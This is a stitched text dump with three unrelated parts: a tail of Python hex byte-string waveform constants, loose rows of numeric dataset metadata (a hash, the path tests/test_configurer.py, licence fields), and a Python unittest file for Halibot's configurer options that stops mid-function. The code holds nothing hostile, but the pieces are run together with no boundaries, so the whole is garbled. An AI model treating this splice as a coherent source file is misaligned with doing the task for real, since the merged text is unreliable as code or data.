b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x07\x8e\x00\x0d\x00\xe0\x09\x21\x00\x02\x07\x8e\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x20\x10\x0c\x80\x00" \ b"\x09\x8d\x00\x04\x00\x00\x00\x40\x09\x24\x00\x04\x00\x02\x4b\xb4" \ b"\x09\x27\x00\x10\x00\x0e\x00\x50\x00\x6c\x00\x65\x00\x74\x00\x68" \ b"\x00\x20\x00\x00\x09\x96\x00\x02\x02\x00\x09\x11\x00\x02\x00\x06" \ b"\x09\x40\x00\x02\x00\x00\x09\x6f\x00\x0c\x00\x7f\xff\xff\x00\x7f" \ b"\xff\xff\x00\x00\x0f\xff\x09\x1a\x00\x24\x00\x04\x00\x20\x00\x7f" \ b"\xff\xff\x04\x00\x00\x00\x00\x7f\xff\xff\x06\x00\x00\x01\x00\x7f" \ b"\xff\xff\x0a\x00\x00\x01\x00\x7f\xff\xff\x0c\x00\x00\x00\x09\x6e" \ b"\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x0e\x06\x05\x05\xfb\x05\xef" \ b"\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66\x05\x4d" \ b"\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91\x04\x78" \ b"\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05\x04\x01" \ b"\x04\x00\x04\x04\x04\x0b\x04\x18" rsp_wave_10_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\xa8\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x28\x04\x3e\x04\x57\x04\x76\x04\x99\x04\xc0\x04\xec" \ b"\x05\x1d\x05\x51\x05\x89\x05\xc5\x06\x05\x06\x47\x06\x8c\x06\xd3" \ b"\x07\x1c\x07\x67\x07\xb3\x07\xff\x08\x4c\x08\x99\x08\xe4\x09\x2f" \ b"\x09\x78\x09\xbf\x0a\x03\x0a\x44\x0a\x83\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53" rsp_wave_10_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\xb0\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x04\x20\x0c" \ b"\x20\x14\x20\x1c\x20\x26\x20\x2f\x20\x38\x20\x42\x20\x4b\x20\x55" \ b"\x20\x5e\x20\x68\x20\x71\x20\x7a\x20\x83\x20\x8d\x20\x96\x20\x9f" \ b"\x20\xa8\x20\xad\x20\xab\x20\xa6\x20\x9e\x20\x95\x20\x8c\x20\x82" \ b"\x20\x78\x20\x6e\x20\x63\x20\x59\x20\x4f\x20\x45\x20\x3a\x20\x30" \ b"\x20\x26\x20\x1c\x20\x12\x20\x08\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0" \ b"\x1f\xee\x1f\xed\x1f\xed\x1f\xec\x1f\xec\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\xa0\x84\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x00\x20\x02" \ b"\x20\x04\x20\x08\x20\x08\x20\x0b\x20\x10\x20\x12\x20\x15\x20\x17" \ b"\x20\x1a\x20\x1c\x20\x1f\x20\x22\x20\x25\x20\x27\x20\x2a\x20\x2d" \ b"\x20\x30\x20\x33\x20\x33\x20\x32\x20\x30\x20\x2f\x20\x2a\x20\x28" \ b"\x20\x24\x20\x22\x20\x1f\x20\x1d\x20\x19\x20\x17\x20\x14\x20\x12" \ b"\x20\x0e\x20\x0c\x20\x0a\x20\x06\x20\x03\x20\x01\x1f\xff\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb" \ 
b"\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x04\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x03\x20\x09" \ b"\x20\x0f\x20\x13\x20\x1d\x20\x23\x20\x27\x20\x2f\x20\x35\x20\x3d" \ b"\x20\x43\x20\x4b\x20\x51\x20\x57\x20\x5d\x20\x65\x20\x6b\x20\x71" \ b"\x20\x77\x20\x79\x20\x77\x20\x73\x20\x6d\x20\x65\x20\x61\x20\x59" \ b"\x20\x53\x20\x4b\x20\x43\x20\x3b\x20\x35\x20\x2d\x20\x25\x20\x1d" \ b"\x20\x17\x20\x0f\x20\x07\x20\x01\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xef\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_10_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\xb8\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ 
b"\x01\x00\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2" \ b"\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef\x1f\xed\x1f\xed\x1f\xec\x1f\xeb" \ b"\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3" \ b"\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb" \ b"\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4" \ b"\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3" \ b"\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde" \ b"\x1f\xdf\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x20\x00\x1f\xff\x1f\xff\x1f\xfe" \ b"\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xf9" \ 
b"\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf7" \ b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4" \ b"\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf6\x1f\xf6\x1f\xf6\x1f\xf7\x1f\xf5" \ b"\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf7\x1f\xf8\x1f\xf8" \ b"\x1f\xf9\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb" \ b"\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3" \ b"\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe3\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf" \ b"\x1f\xdd\x1f\xdd\x1f\xdb\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xdd" \ b"\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xdf\x1f\xdf\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe5\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15"
65.08506
69
0.699434
51,045
210,420
2.877657
0.005387
0.172088
0.223882
0.292464
0.989005
0.985499
0.984383
0.983198
0.975805
0.972258
0
0.298406
0.030349
210,420
3,232
70
65.105198
0.421523
0.000623
0
0.878711
0
0.939355
0.905489
0.904195
0
1
0
0
0
1
0
false
0
0
0
0
0.000319
0
0
0
null
0
1
1
1
1
1
1
1
1
0
1
0
0
0
0
0
1
0
0
1
0
1
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
15
46267a4356c0ae5ab15daed0682646c96521f6b2
3,884
py
Python
tests/test_configurer.py
Halibot/Halibot
36b8f2b4d7d3c7dbbb63b1eacea6c57accc8b26d
[ "BSD-3-Clause" ]
null
null
null
tests/test_configurer.py
Halibot/Halibot
36b8f2b4d7d3c7dbbb63b1eacea6c57accc8b26d
[ "BSD-3-Clause" ]
null
null
null
tests/test_configurer.py
Halibot/Halibot
36b8f2b4d7d3c7dbbb63b1eacea6c57accc8b26d
[ "BSD-3-Clause" ]
null
null
null
import util import halibot import unittest from unittest.mock import patch class TestConfigurer(unittest.TestCase): @patch('halibot.halconfigurer.get_input', return_value='bar') def test_optionString_str(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionString('foo', default="foo") c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], "bar") @patch('halibot.halconfigurer.get_input', return_value=2) def test_optionInt_int(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionInt('foo', default=1) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], 2) @patch('halibot.halconfigurer.get_input', return_value="2") def test_optionInt_str(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionInt('foo', default=1) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], 2) @patch('halibot.halconfigurer.get_input', return_value=None) def test_optionInt_none(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionInt('foo', default=1) c = Configurer() try: c.configure() except TypeError as e: # Yay, we type errored as expected return self.assertTrue(False) # pragma: no cover @patch('halibot.halconfigurer.get_input', return_value=2.1) def test_optionNumber_int(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionNumber('foo', default=1.0) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], 2.1) @patch('halibot.halconfigurer.get_input', return_value="2") def test_optionNumber_str(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionNumber('foo', default=1.0) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], 2) 
@patch('halibot.halconfigurer.get_input', return_value=None) def test_optionNumber_none(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionNumber('foo', default=1.0) c = Configurer() try: c.configure() except TypeError as e: # Yay, we type errored as expected return self.assertTrue(False) # pragma: no cover @patch('halibot.halconfigurer.get_input', return_value=True) def test_optionBoolean_true(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionBoolean('foo', default=False) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], True) @patch('halibot.halconfigurer.get_input', return_value=False) def test_optionBoolean_false(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionBoolean('foo', default=True) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], False) @patch('halibot.halconfigurer.get_input', return_value="TrUe") def test_optionBoolean_strTrue(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionBoolean('foo', default=False) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], True) @patch('halibot.halconfigurer.get_input', return_value="FaLsE") def test_optionBoolean_strFalse(self, input): class Configurer(halibot.HalConfigurer): def 